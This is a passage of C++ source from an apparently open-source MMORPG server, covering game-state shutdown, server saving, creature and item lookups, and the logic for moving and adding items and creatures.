g_globalEvents->startup(); break; } case GAME_STATE_SHUTDOWN: { g_globalEvents->execute(GLOBALEVENT_SHUTDOWN); //kick all players that are still online auto it = players.begin(); while (it != players.end()) { it->second->kickPlayer(true); it = players.begin(); } saveMotdNum(); saveGameState(); g_dispatcher.addTask( createTask(std::bind(&Game::shutdown, this))); g_scheduler.stop(); g_databaseTasks.stop(); g_dispatcher.stop(); break; } case GAME_STATE_CLOSED: { /* kick all players without the CanAlwaysLogin flag */ auto it = players.begin(); while (it != players.end()) { if (!it->second->hasFlag(PlayerFlag_CanAlwaysLogin)) { it->second->kickPlayer(true); it = players.begin(); } else { ++it; } } saveGameState(); break; } default: break; } } void Game::saveGameState() { if (gameState == GAME_STATE_NORMAL) { setGameState(GAME_STATE_MAINTAIN); } std::cout << "Saving server..." << std::endl; if (!saveAccountStorageValues()) { std::cout << "[Error - Game::saveGameState] Failed to save account-level storage values." << std::endl; } for (const auto& it : players) { it.second->loginPosition = it.second->getPosition(); IOLoginData::savePlayer(it.second); } Map::save(); g_databaseTasks.flush(); if (gameState == GAME_STATE_MAINTAIN) { setGameState(GAME_STATE_NORMAL); } } bool Game::loadMainMap(const std::string& filename) { return map.loadMap("data/world/" + filename + ".otbm", true); } void Game::loadMap(const std::string& path) { map.loadMap(path, false); } Cylinder* Game::internalGetCylinder(Player* player, const Position& pos) const { if (pos.x != 0xFFFF) { return map.getTile(pos); } //container if (pos.y & 0x40) { uint8_t from_cid = pos.y & 0x0F; return player->getContainerByID(from_cid); } //inventory return player; } Thing* Game::internalGetThing(Player* player, const Position& pos, int32_t index, uint32_t spriteId, stackPosType_t type) const { if (pos.x != 0xFFFF) { Tile* tile = map.getTile(pos); if (!tile) { return nullptr; } Thing* thing; switch (type) { case STACKPOS_LOOK: { return tile->getTopVisibleThing(player); } case STACKPOS_MOVE: { Item* item = tile->getTopDownItem(); if (item && item->isMoveable()) { thing = item; } else { thing = tile->getTopVisibleCreature(player); } break; } case STACKPOS_USEITEM: { thing = tile->getUseItem(index); break; } case STACKPOS_TOPDOWN_ITEM: { thing = tile->getTopDownItem(); break; } case STACKPOS_USETARGET: { thing = tile->getTopVisibleCreature(player); if (!thing) { thing = tile->getUseItem(index); } break; } default: { thing = nullptr; break; } } if (player && tile->hasFlag(TILESTATE_SUPPORTS_HANGABLE)) { //do extra checks here if the thing is accessible if (thing && thing->getItem()) { if (tile->hasProperty(CONST_PROP_ISVERTICAL)) { if (player->getPosition().x + 1 == tile->getPosition().x) { thing = nullptr; } } else { // horizontal if (player->getPosition().y + 1 == tile->getPosition().y) { thing = nullptr; } } } } return thing; } //container if (pos.y & 0x40) { uint8_t fromCid = pos.y & 0x0F; Container* parentContainer = player->getContainerByID(fromCid); if (!parentContainer) { return nullptr; } if (parentContainer->getID() == ITEM_BROWSEFIELD) { Tile* tile = parentContainer->getTile(); if (tile && tile->hasFlag(TILESTATE_SUPPORTS_HANGABLE)) { if (tile->hasProperty(CONST_PROP_ISVERTICAL)) { if (player->getPosition().x + 1 == tile->getPosition().x) { return nullptr; } } else { // horizontal if (player->getPosition().y + 1 == tile->getPosition().y) { return nullptr; } } } } uint8_t slot = pos.z; return parentContainer->getItemByIndex(player->getContainerIndex(fromCid) + slot); } else if (pos.y == 0 && pos.z == 0) { const ItemType& it = Item::items.getItemIdByClientId(spriteId); if (it.id == 0) { return nullptr; } int32_t subType; if (it.isFluidContainer() && index < static_cast<int32_t>(sizeof(reverseFluidMap) / sizeof(uint8_t))) { subType = reverseFluidMap[index]; } else { subType = -1; } return findItemOfType(player, it.id, true, subType); } //inventory slots_t slot = static_cast<slots_t>(pos.y); if (slot == CONST_SLOT_STORE_INBOX) { return player->getStoreInbox(); } return player->getInventoryItem(slot); } void Game::internalGetPosition(Item* item, Position& pos, uint8_t& stackpos) { pos.x = 0; pos.y = 0; pos.z = 0; stackpos = 0; Cylinder* topParent = item->getTopParent(); if (topParent) { if (Player* player = dynamic_cast<Player*>(topParent)) { pos.x = 0xFFFF; Container* container = dynamic_cast<Container*>(item->getParent()); if (container) { pos.y = static_cast<uint16_t>(0x40) | static_cast<uint16_t>(player->getContainerID(container)); pos.z = container->getThingIndex(item); stackpos = pos.z; } else { pos.y = player->getThingIndex(item); stackpos = pos.y; } } else if (Tile* tile = topParent->getTile()) { pos = tile->getPosition(); stackpos = tile->getThingIndex(item); } } } Creature* Game::getCreatureByID(uint32_t id) { if (id <= Player::playerAutoID) { return getPlayerByID(id); } else if (id <= Monster::monsterAutoID) { return getMonsterByID(id); } else if (id <= Npc::npcAutoID) { return getNpcByID(id); } return nullptr; } Monster* Game::getMonsterByID(uint32_t id) { if (id == 0) { return nullptr; } auto it = monsters.find(id); if (it == monsters.end()) { return nullptr; } return it->second; } Npc* Game::getNpcByID(uint32_t id) { if (id == 0) { return nullptr; } auto it = npcs.find(id); if (it == npcs.end()) { return nullptr; } return it->second; } Player* Game::getPlayerByID(uint32_t id) { if (id == 0) { return nullptr; } auto it = players.find(id); if (it == players.end()) { return nullptr; } return it->second; } Creature* Game::getCreatureByName(const std::string& s) { if (s.empty()) { return nullptr; } const std::string& lowerCaseName = asLowerCaseString(s); { auto it = mappedPlayerNames.find(lowerCaseName); if (it != mappedPlayerNames.end()) { return it->second; } } auto equalCreatureName = [&](const std::pair<uint32_t, Creature*>& it) { auto name = it.second->getName(); return lowerCaseName.size() == name.size() && std::equal(lowerCaseName.begin(), lowerCaseName.end(), name.begin(), [](char a, char b) { return a == std::tolower(b); }); }; { auto it = std::find_if(npcs.begin(), npcs.end(), equalCreatureName); if (it != npcs.end()) { return it->second; } } { auto it = std::find_if(monsters.begin(), monsters.end(), equalCreatureName); if (it != monsters.end()) { return it->second; } } return nullptr; } Npc* Game::getNpcByName(const std::string& s) { if (s.empty()) { return nullptr; } const char* npcName = s.c_str(); for (const auto& it : npcs) { if (strcasecmp(npcName, it.second->getName().c_str()) == 0) { return it.second; } } return nullptr; } Player* Game::getPlayerByName(const std::string& s) { if (s.empty()) { return nullptr; } auto it = mappedPlayerNames.find(asLowerCaseString(s)); if (it == mappedPlayerNames.end()) { return nullptr; } return it->second; } Player* Game::getPlayerByGUID(const uint32_t& guid) { if (guid == 0) { return nullptr; } auto it = mappedPlayerGuids.find(guid); if (it == mappedPlayerGuids.end()) { return nullptr; } return it->second; } ReturnValue Game::getPlayerByNameWildcard(const std::string& s, Player*& player) { size_t strlen = s.length(); if (strlen == 0 || strlen > 20) { return RETURNVALUE_PLAYERWITHTHISNAMEISNOTONLINE; } if (s.back() == '~') { const std::string& query = asLowerCaseString(s.substr(0, strlen - 1)); std::string result; ReturnValue ret = wildcardTree.findOne(query, result); if (ret != RETURNVALUE_NOERROR) { return ret; } player = getPlayerByName(result); } else { player = getPlayerByName(s); } if (!player) { return RETURNVALUE_PLAYERWITHTHISNAMEISNOTONLINE; } return RETURNVALUE_NOERROR; } Player* Game::getPlayerByAccount(uint32_t acc) { for (const auto& it : players) { if (it.second->getAccount() == acc) { return it.second; } } return nullptr; } bool Game::internalPlaceCreature(Creature* creature, const Position& pos, bool extendedPos /*=false*/, bool forced /*= false*/) { if (creature->getParent() != nullptr) { return false; } if (!map.placeCreature(pos, creature, extendedPos, forced)) { return false; } creature->incrementReferenceCounter(); creature->setID(); creature->addList(); return true; } bool Game::placeCreature(Creature* creature, const Position& pos, bool extendedPos /*=false*/, bool forced /*= false*/) { if (!internalPlaceCreature(creature, pos, extendedPos, forced)) { return false; } SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true); for (Creature* spectator : spectators) { if (Player* tmpPlayer = spectator->getPlayer()) { tmpPlayer->sendCreatureAppear(creature, creature->getPosition(), true); } } for (Creature* spectator : spectators) { spectator->onCreatureAppear(creature, true); } creature->getParent()->postAddNotification(creature, nullptr, 0); addCreatureCheck(creature); creature->onPlacedCreature(); return true; } bool Game::removeCreature(Creature* creature, bool isLogout/* = true*/) { if (creature->isRemoved()) { return false; } Tile* tile = creature->getTile(); std::vector<int32_t> oldStackPosVector; SpectatorVec spectators; map.getSpectators(spectators, tile->getPosition(), true); for (Creature* spectator : spectators) { if (Player* player = spectator->getPlayer()) { oldStackPosVector.push_back(player->canSeeCreature(creature) ? tile->getClientIndexOfCreature(player, creature) : -1); } } tile->removeCreature(creature); const Position& tilePosition = tile->getPosition(); //send to client size_t i = 0; for (Creature* spectator : spectators) { if (Player* player = spectator->getPlayer()) { player->sendRemoveTileCreature(creature, tilePosition, oldStackPosVector[i++]); } } //event method for (Creature* spectator : spectators) { spectator->onRemoveCreature(creature, isLogout); } creature->getParent()->postRemoveNotification(creature, nullptr, 0); creature->removeList(); creature->setRemoved(); ReleaseCreature(creature); removeCreatureCheck(creature); for (Creature* summon : creature->summons) { summon->setSkillLoss(false); removeCreature(summon); } return true; } void Game::executeDeath(uint32_t creatureId) { Creature* creature = getCreatureByID(creatureId); if (creature && !creature->isRemoved()) { creature->onDeath(); } } void Game::playerMoveThing(uint32_t playerId, const Position& fromPos, uint16_t spriteId, uint8_t fromStackPos, const Position& toPos, uint8_t count) { Player* player = getPlayerByID(playerId); if (!player) { return; } uint8_t fromIndex = 0; if (fromPos.x == 0xFFFF) { if (fromPos.y & 0x40) { fromIndex = fromPos.z; } else { fromIndex = static_cast<uint8_t>(fromPos.y); } } else { fromIndex = fromStackPos; } Thing* thing = internalGetThing(player, fromPos, fromIndex, 0, STACKPOS_MOVE); if (!thing) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } if (Creature* movingCreature = thing->getCreature()) { Tile* tile = map.getTile(toPos); if (!tile) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } if (Position::areInRange<1, 1, 0>(movingCreature->getPosition(), player->getPosition())) { SchedulerTask* task = createSchedulerTask(1000, std::bind(&Game::playerMoveCreatureByID, this, player->getID(), movingCreature->getID(), movingCreature->getPosition(), tile->getPosition())); player->setNextActionTask(task); } else { playerMoveCreature(player, movingCreature, movingCreature->getPosition(), tile); } } else if (thing->getItem()) { Cylinder* toCylinder = internalGetCylinder(player, toPos); if (!toCylinder) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } playerMoveItem(player, fromPos, spriteId, fromStackPos, toPos, count, thing->getItem(), toCylinder); } } void Game::playerMoveCreatureByID(uint32_t playerId, uint32_t movingCreatureId, const Position& movingCreatureOrigPos, const Position& toPos) { Player* player = getPlayerByID(playerId); if (!player) { return; } Creature* movingCreature = getCreatureByID(movingCreatureId); if (!movingCreature) { return; } Tile* toTile = map.getTile(toPos); if (!toTile) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } playerMoveCreature(player, movingCreature, movingCreatureOrigPos, toTile); } void Game::playerMoveCreature(Player* player, Creature* movingCreature, const Position& movingCreatureOrigPos, Tile* toTile) { if (!player->canDoAction()) { uint32_t delay = player->getNextActionTime(); SchedulerTask* task = createSchedulerTask(delay, std::bind(&Game::playerMoveCreatureByID, this, player->getID(), movingCreature->getID(), movingCreatureOrigPos, toTile->getPosition())); player->setNextActionTask(task); return; } if (movingCreature->isMovementBlocked()) { player->sendCancelMessage(RETURNVALUE_NOTMOVEABLE); return; } player->setNextActionTask(nullptr); if (!Position::areInRange<1, 1, 0>(movingCreatureOrigPos, player->getPosition())) { //need to walk to the creature first before moving it std::vector<Direction> listDir; if (player->getPathTo(movingCreatureOrigPos, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(1500, std::bind(&Game::playerMoveCreatureByID, this, player->getID(), movingCreature->getID(), movingCreatureOrigPos, toTile->getPosition())); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } if ((!movingCreature->isPushable() && !player->hasFlag(PlayerFlag_CanPushAllCreatures)) || (movingCreature->isInGhostMode() && !player->canSeeGhostMode(movingCreature))) { player->sendCancelMessage(RETURNVALUE_NOTMOVEABLE); return; } //check throw distance const Position& movingCreaturePos = movingCreature->getPosition(); const Position& toPos = toTile->getPosition(); if ((Position::getDistanceX(movingCreaturePos, toPos) > movingCreature->getThrowRange()) || (Position::getDistanceY(movingCreaturePos, toPos) > movingCreature->getThrowRange()) || (Position::getDistanceZ(movingCreaturePos, toPos) * 4 > movingCreature->getThrowRange())) { player->sendCancelMessage(RETURNVALUE_DESTINATIONOUTOFREACH); return; } if (player != movingCreature) { if (toTile->hasFlag(TILESTATE_BLOCKPATH)) { player->sendCancelMessage(RETURNVALUE_NOTENOUGHROOM); return; } else if ((movingCreature->getZone() == ZONE_PROTECTION && !toTile->hasFlag(TILESTATE_PROTECTIONZONE)) || (movingCreature->getZone() == ZONE_NOPVP && !toTile->hasFlag(TILESTATE_NOPVPZONE))) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } else { if (CreatureVector* tileCreatures = toTile->getCreatures()) { for (Creature* tileCreature : *tileCreatures) { if (!tileCreature->isInGhostMode()) { player->sendCancelMessage(RETURNVALUE_NOTENOUGHROOM); return; } } } Npc* movingNpc = movingCreature->getNpc(); if (movingNpc && !Spawns::isInZone(movingNpc->getMasterPos(), movingNpc->getMasterRadius(), toPos)) { player->sendCancelMessage(RETURNVALUE_NOTENOUGHROOM); return; } } } if (!g_events->eventPlayerOnMoveCreature(player, movingCreature, movingCreaturePos, toPos)) { return; } ReturnValue ret = internalMoveCreature(*movingCreature, *toTile); if (ret != RETURNVALUE_NOERROR) { player->sendCancelMessage(ret); } } ReturnValue Game::internalMoveCreature(Creature* creature, Direction direction, uint32_t flags /*= 0*/) { creature->setLastPosition(creature->getPosition()); const Position& currentPos = creature->getPosition(); Position destPos = getNextPosition(direction, currentPos); Player* player = creature->getPlayer(); bool diagonalMovement = (direction & DIRECTION_DIAGONAL_MASK) != 0; if (player && !diagonalMovement) { //try to go up if (currentPos.z != 8 && creature->getTile()->hasHeight(3)) { Tile* tmpTile = map.getTile(currentPos.x, currentPos.y, currentPos.getZ() - 1); if (tmpTile == nullptr || (tmpTile->getGround() == nullptr && !tmpTile->hasFlag(TILESTATE_BLOCKSOLID))) { tmpTile = map.getTile(destPos.x, destPos.y, destPos.getZ() - 1); if (tmpTile && tmpTile->getGround() && !tmpTile->hasFlag(TILESTATE_BLOCKSOLID)) { flags |= FLAG_IGNOREBLOCKITEM | FLAG_IGNOREBLOCKCREATURE; if (!tmpTile->hasFlag(TILESTATE_FLOORCHANGE)) { player->setDirection(direction); destPos.z--; } } } } //try to go down if (currentPos.z != 7 && currentPos.z == destPos.z) { Tile* tmpTile = map.getTile(destPos.x, destPos.y, destPos.z); if (tmpTile == nullptr || (tmpTile->getGround() == nullptr && !tmpTile->hasFlag(TILESTATE_BLOCKSOLID))) { tmpTile = map.getTile(destPos.x, destPos.y, destPos.z + 1); if (tmpTile && tmpTile->hasHeight(3)) { flags |= FLAG_IGNOREBLOCKITEM | FLAG_IGNOREBLOCKCREATURE; player->setDirection(direction); destPos.z++; } } } } Tile* toTile = map.getTile(destPos); if (!toTile) { return RETURNVALUE_NOTPOSSIBLE; } return internalMoveCreature(*creature, *toTile, flags); } ReturnValue Game::internalMoveCreature(Creature& creature, Tile& toTile, uint32_t flags /*= 0*/) { //check if we can move the creature to the destination ReturnValue ret = toTile.queryAdd(0, creature, 1, flags); if (ret != RETURNVALUE_NOERROR) { return ret; } map.moveCreature(creature, toTile); if (creature.getParent() != &toTile) { return RETURNVALUE_NOERROR; } int32_t index = 0; Item* toItem = nullptr; Tile* subCylinder = nullptr; Tile* toCylinder = &toTile; Tile* fromCylinder = nullptr; uint32_t n = 0; while ((subCylinder = toCylinder->queryDestination(index, creature, &toItem, flags)) != toCylinder) { map.moveCreature(creature, *subCylinder); if (creature.getParent() != subCylinder) { //could happen if a script move the creature fromCylinder = nullptr; break; } fromCylinder = toCylinder; toCylinder = subCylinder; flags = 0; //to prevent infinite loop if (++n >= MAP_MAX_LAYERS) { break; } } if (fromCylinder) { const Position& fromPosition = fromCylinder->getPosition(); const Position& toPosition = toCylinder->getPosition(); if (fromPosition.z != toPosition.z && (fromPosition.x != toPosition.x || fromPosition.y != toPosition.y)) { Direction dir = getDirectionTo(fromPosition, toPosition); if ((dir & DIRECTION_DIAGONAL_MASK) == 0) { internalCreatureTurn(&creature, dir); } } } return RETURNVALUE_NOERROR; } void Game::playerMoveItemByPlayerID(uint32_t playerId, const Position& fromPos, uint16_t spriteId, uint8_t fromStackPos, const Position& toPos, uint8_t count) { Player* player = getPlayerByID(playerId); if (!player) { return; } playerMoveItem(player, fromPos, spriteId, fromStackPos, toPos, count, nullptr, nullptr); } void Game::playerMoveItem(Player* player, const Position& fromPos, uint16_t spriteId, uint8_t fromStackPos, const Position& toPos, uint8_t count, Item* item, Cylinder* toCylinder) { if (!player->canDoAction()) { uint32_t delay = player->getNextActionTime(); SchedulerTask* task = createSchedulerTask(delay, std::bind(&Game::playerMoveItemByPlayerID, this, player->getID(), fromPos, spriteId, fromStackPos, toPos, count)); player->setNextActionTask(task); return; } player->setNextActionTask(nullptr); if (item == nullptr) { uint8_t fromIndex = 0; if (fromPos.x == 0xFFFF) { if (fromPos.y & 0x40) { fromIndex = fromPos.z; } else { fromIndex = static_cast<uint8_t>(fromPos.y); } } else { fromIndex = fromStackPos; } Thing* thing = internalGetThing(player, fromPos, fromIndex, 0, STACKPOS_MOVE); if (!thing || !thing->getItem()) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } item = thing->getItem(); } if (item->getClientID() != spriteId) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Cylinder* fromCylinder = internalGetCylinder(player, fromPos); if (fromCylinder == nullptr) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } if (toCylinder == nullptr) { toCylinder = internalGetCylinder(player, toPos); if (toCylinder == nullptr) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } } if (!item->isPushable() || item->hasAttribute(ITEM_ATTRIBUTE_UNIQUEID)) { player->sendCancelMessage(RETURNVALUE_NOTMOVEABLE); return; } const Position& playerPos = player->getPosition(); const Position& mapFromPos = fromCylinder->getTile()->getPosition(); if (playerPos.z != mapFromPos.z) { player->sendCancelMessage(playerPos.z > mapFromPos.z ? RETURNVALUE_FIRSTGOUPSTAIRS : RETURNVALUE_FIRSTGODOWNSTAIRS); return; } if (!Position::areInRange<1, 1>(playerPos, mapFromPos)) { //need to walk to the item first before using it std::vector<Direction> listDir; if (player->getPathTo(item->getPosition(), listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerMoveItemByPlayerID, this, player->getID(), fromPos, spriteId, fromStackPos, toPos, count)); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } const Tile* toCylinderTile = toCylinder->getTile(); const Position& mapToPos = toCylinderTile->getPosition(); //hangable item specific code if (item->isHangable() && toCylinderTile->hasFlag(TILESTATE_SUPPORTS_HANGABLE)) { //destination supports hangable objects so need to move there first bool vertical = toCylinderTile->hasProperty(CONST_PROP_ISVERTICAL); if (vertical) { if (playerPos.x + 1 == mapToPos.x) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } } else { // horizontal if (playerPos.y + 1 == mapToPos.y) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } } if (!Position::areInRange<1, 1, 0>(playerPos, mapToPos)) { Position walkPos = mapToPos; if (vertical) { walkPos.x++; } else { walkPos.y++; } Position itemPos = fromPos; uint8_t itemStackPos = fromStackPos; if (fromPos.x != 0xFFFF && Position::areInRange<1, 1>(mapFromPos, playerPos) && !Position::areInRange<1, 1, 0>(mapFromPos, walkPos)) { //need to pickup the item first Item* moveItem = nullptr; ReturnValue ret = internalMoveItem(fromCylinder, player, INDEX_WHEREEVER, item, count, &moveItem, 0, player, nullptr, &fromPos, &toPos); if (ret != RETURNVALUE_NOERROR) { player->sendCancelMessage(ret); return; } //changing the position since its now in the inventory of the player internalGetPosition(moveItem, itemPos, itemStackPos); } std::vector<Direction> listDir; if (player->getPathTo(walkPos, listDir, 0, 0, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerMoveItemByPlayerID, this, player->getID(), itemPos, spriteId, itemStackPos, toPos, count)); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } } if (!item->isPickupable() && playerPos.z != mapToPos.z) { player->sendCancelMessage(RETURNVALUE_DESTINATIONOUTOFREACH); return; } int32_t throwRange = item->getThrowRange(); if ((Position::getDistanceX(playerPos, mapToPos) > throwRange) || (Position::getDistanceY(playerPos, mapToPos) > throwRange)) { player->sendCancelMessage(RETURNVALUE_DESTINATIONOUTOFREACH); return; } if (!canThrowObjectTo(mapFromPos, mapToPos, true, false, throwRange, throwRange)) { player->sendCancelMessage(RETURNVALUE_CANNOTTHROW); return; } uint8_t toIndex = 0; if (toPos.x == 0xFFFF) { if (toPos.y & 0x40) { toIndex = toPos.z; } else { toIndex = static_cast<uint8_t>(toPos.y); } } ReturnValue ret = internalMoveItem(fromCylinder, toCylinder, toIndex, item, count, nullptr, 0, player, nullptr, &fromPos, &toPos); if (ret != RETURNVALUE_NOERROR) { player->sendCancelMessage(ret); } } ReturnValue Game::internalMoveItem(Cylinder* fromCylinder, Cylinder* toCylinder, int32_t index, Item* item, uint32_t count, Item** _moveItem, uint32_t flags /*= 0*/, Creature* actor/* = nullptr*/, Item* tradeItem/* = nullptr*/, const Position* fromPos /*= nullptr*/, const Position* toPos/*= nullptr*/) { Player* actorPlayer = actor ? actor->getPlayer() : nullptr; if (actorPlayer && fromPos && toPos) { if (!g_events->eventPlayerOnMoveItem(actorPlayer, item, count, *fromPos, *toPos, fromCylinder, toCylinder)) { return RETURNVALUE_NOTPOSSIBLE; } } Tile* fromTile = fromCylinder->getTile(); if (fromTile) { auto it = browseFields.find(fromTile); if (it != browseFields.end() && it->second == fromCylinder) { fromCylinder = fromTile; } } Item* toItem = nullptr; Cylinder* subCylinder; int floorN = 0; while ((subCylinder = toCylinder->queryDestination(index, *item, &toItem, flags)) != toCylinder) { toCylinder = subCylinder; flags = 0; //to prevent infinite loop if (++floorN >= MAP_MAX_LAYERS) { break; } } //destination is the same as the source? if (item == toItem) { return RETURNVALUE_NOERROR; //silently ignore move } //check if we can add this item ReturnValue ret = toCylinder->queryAdd(index, *item, count, flags, actor); if (ret == RETURNVALUE_NEEDEXCHANGE) { //check if we can add it to source cylinder ret = fromCylinder->queryAdd(fromCylinder->getThingIndex(item), *toItem, toItem->getItemCount(), 0); if (ret == RETURNVALUE_NOERROR) { if (actorPlayer && fromPos && toPos && !g_events->eventPlayerOnMoveItem(actorPlayer, toItem, count, *toPos, *fromPos, toCylinder, fromCylinder)) { return RETURNVALUE_NOTPOSSIBLE; } //check how much we can move uint32_t maxExchangeQueryCount = 0; ReturnValue retExchangeMaxCount = fromCylinder->queryMaxCount(INDEX_WHEREEVER, *toItem, toItem->getItemCount(), maxExchangeQueryCount, 0); if (retExchangeMaxCount != RETURNVALUE_NOERROR && maxExchangeQueryCount == 0) { return retExchangeMaxCount; } if (toCylinder->queryRemove(*toItem, toItem->getItemCount(), flags, actor) == RETURNVALUE_NOERROR) { int32_t oldToItemIndex = toCylinder->getThingIndex(toItem); toCylinder->removeThing(toItem, toItem->getItemCount()); fromCylinder->addThing(toItem); if (oldToItemIndex != -1) { toCylinder->postRemoveNotification(toItem, fromCylinder, oldToItemIndex); } int32_t newToItemIndex = fromCylinder->getThingIndex(toItem); if (newToItemIndex != -1) { fromCylinder->postAddNotification(toItem, toCylinder, newToItemIndex); } ret = toCylinder->queryAdd(index, *item, count, flags); toItem = nullptr; } } } if (ret != RETURNVALUE_NOERROR) { return ret; } //check how much we can move uint32_t maxQueryCount = 0; ReturnValue retMaxCount = toCylinder->queryMaxCount(index, *item, count, maxQueryCount, flags); if (retMaxCount != RETURNVALUE_NOERROR && maxQueryCount == 0) { return retMaxCount; } uint32_t m; if (item->isStackable()) { m = std::min<uint32_t>(count, maxQueryCount); } else { m = maxQueryCount; } Item* moveItem = item; //check if we can remove this item ret = fromCylinder->queryRemove(*item, m, flags, actor); if (ret != RETURNVALUE_NOERROR) { return ret; } if (tradeItem) { if (toCylinder->getItem() == tradeItem) { return RETURNVALUE_NOTENOUGHROOM; } Cylinder* tmpCylinder = toCylinder->getParent(); while (tmpCylinder) { if (tmpCylinder->getItem() == tradeItem) { return RETURNVALUE_NOTENOUGHROOM; } tmpCylinder = tmpCylinder->getParent(); } } //remove the item int32_t itemIndex = fromCylinder->getThingIndex(item); Item* updateItem = nullptr; fromCylinder->removeThing(item, m); //update item(s) if (item->isStackable()) { uint32_t n; if (item->equals(toItem)) { n = std::min<uint32_t>(100 - toItem->getItemCount(), m); toCylinder->updateThing(toItem, toItem->getID(), toItem->getItemCount() + n); updateItem = toItem; } else { n = 0; } int32_t newCount = m - n; if (newCount > 0) { moveItem = item->clone(); moveItem->setItemCount(newCount); } else { moveItem = nullptr; } if (item->isRemoved()) { ReleaseItem(item); } } //add item if (moveItem /*m - n > 0*/) { toCylinder->addThing(index, moveItem); } if (itemIndex != -1) { fromCylinder->postRemoveNotification(item, toCylinder, itemIndex); } if (moveItem) { int32_t moveItemIndex = toCylinder->getThingIndex(moveItem); if (moveItemIndex != -1) { toCylinder->postAddNotification(moveItem, fromCylinder, moveItemIndex); } } if (updateItem) { int32_t updateItemIndex = toCylinder->getThingIndex(updateItem); if (updateItemIndex != -1) { toCylinder->postAddNotification(updateItem, fromCylinder, updateItemIndex); } } if (_moveItem) { if (moveItem) { *_moveItem = moveItem; } else { *_moveItem = item; } } //we could not move all, inform the player if (item->isStackable() && maxQueryCount < count) { return retMaxCount; } if (moveItem && moveItem->getDuration() > 0) { if (moveItem->getDecaying() != DECAYING_TRUE) { moveItem->incrementReferenceCounter(); moveItem->setDecaying(DECAYING_TRUE); toDecayItems.push_front(moveItem); } } if (actorPlayer && fromPos && toPos) { g_events->eventPlayerOnItemMoved(actorPlayer, item, count, *fromPos, *toPos, fromCylinder, toCylinder); } return ret; } ReturnValue Game::internalAddItem(Cylinder* toCylinder, Item* item, int32_t index /*= INDEX_WHEREEVER*/, uint32_t flags/* = 0*/, bool test/* = false*/) { uint32_t remainderCount = 0; return internalAddItem(toCylinder, item, index, flags, test, remainderCount); } ReturnValue Game::internalAddItem(Cylinder* toCylinder, Item* item, int32_t index, uint32_t flags, bool test, uint32_t& remainderCount) { if (toCylinder == nullptr || item == nullptr) { return RETURNVALUE_NOTPOSSIBLE; } Cylinder* destCylinder = toCylinder; Item* toItem = nullptr; toCylinder = toCylinder->queryDestination(index, *item, &toItem, flags); //check if we can add this item ReturnValue ret = toCylinder->queryAdd(index, *item, item->getItemCount(), flags); if (ret != RETURNVALUE_NOERROR) { return ret; } /* Check if we can move add the whole amount, we do this by checking against the original cylinder, since the queryDestination can return a cylinder that might only hold a part of the full amount. */ uint32_t maxQueryCount = 0; ret = destCylinder->queryMaxCount(INDEX_WHEREEVER, *item, item->getItemCount(), maxQueryCount, flags); if (ret != RETURNVALUE_NOERROR) { return ret; } if (test) { return RETURNVALUE_NOERROR; } if (item->isStackable() && item->equals(toItem)) { uint32_t m = std::min<uint32_t>(item->getItemCount(), maxQueryCount); uint32_t n = std::min<uint32_t>(100 - toItem->getItemCount(), m); toCylinder->updateThing(toItem, toItem->getID(), toItem->getItemCount() + n); int32_t count = m - n; if (count > 0) { if (item->getItemCount() != count) { Item* remainderItem = item->clone(); remainderItem->setItemCount(count); if (internalAddItem(destCylinder, remainderItem, INDEX_WHEREEVER, flags, false) != RETURNVALUE_NOERROR) { ReleaseItem(remainderItem); remainderCount = count; } } else { toCylinder->addThing(index, item); int32_t itemIndex = toCylinder->getThingIndex(item); if (itemIndex != -1) { toCylinder->postAddNotification(item, nullptr, itemIndex); } } } else { //fully merged with toItem, item will be destroyed item->onRemoved(); ReleaseItem(item); int32_t itemIndex = toCylinder->getThingIndex(toItem); if (itemIndex != -1) { toCylinder->postAddNotification(toItem, nullptr, itemIndex); } } } else { toCylinder->addThing(index, item); int32_t itemIndex = toCylinder->getThingIndex(item); if (itemIndex != -1) { toCylinder->postAddNotification(item, nullptr, itemIndex); } } if (item->getDuration() > 0) { item->incrementReferenceCounter(); item->setDecaying(DECAYING_TRUE); toDecayItems.push_front(item); } return RETURNVALUE_NOERROR; } ReturnValue Game::internalRemoveItem(Item* item, int32_t count /*= -1*/, bool test /*= false*/, uint32_t flags /*= 0*/) { Cylinder* cylinder = item->getParent(); if (cylinder == nullptr) { return RETURNVALUE_NOTPOSSIBLE; } Tile* fromTile = cylinder->getTile(); if (fromTile) { auto it = browseFields.find(fromTile); if (it != browseFields.end() && it->second == cylinder) { cylinder = fromTile; } } if (count == -1) { count = item->getItemCount(); } //check if we can remove this item ReturnValue ret = cylinder->queryRemove(*item, count, flags | FLAG_IGNORENOTMOVEABLE); if (ret != RETURNVALUE_NOERROR) { return ret; } if (!item->canRemove()) { return RETURNVALUE_NOTPOSSIBLE; } if (!test) { int32_t index = cylinder->getThingIndex(item); //remove the item cylinder->removeThing(item, count); if (item->isRemoved()) { item->onRemoved(); if (item->canDecay()) { decayItems->remove(item); } ReleaseItem(item); } cylinder->postRemoveNotification(item, nullptr, index); } return RETURNVALUE_NOERROR; } ReturnValue Game::internalPlayerAddItem(Player* player, Item* item, bool dropOnMap /*= true*/, slots_t slot /*= 